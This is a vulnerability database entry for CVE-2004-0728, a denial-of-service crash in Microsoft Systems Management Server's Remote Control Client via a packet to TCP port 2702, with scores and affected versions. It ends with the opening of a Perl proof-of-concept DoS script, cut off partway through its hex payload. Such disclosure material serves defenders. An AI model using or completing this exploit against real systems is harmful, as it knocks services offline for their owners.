5
CVSSv2

CVE-2004-0728

Published: 27/07/2004 Updated: 11/07/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

The Remote Control Client service in Microsoft's Systems Management Server (SMS) 2.50.2726.0 allows remote malicious users to cause a denial of service (crash) via a data packet to TCP port 2702 that causes the server to read or write to an invalid memory address.

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft systems management server 1.2

microsoft systems management server 2.50.2726

microsoft systems management server 2.0

Exploits

#!/usr/bin/perl ############################# # # SMS DOS proof of concept and test code # ############################# use Socket; use IO::Socket; if (@ARGV != 1) { print "usage: $0 <host or ip>\n"; exit; } $host = shift(@ARGV); $hexmsg = converthex("52434830160040005243484558585858585858585858585858585858585858585858585858585858585858 ...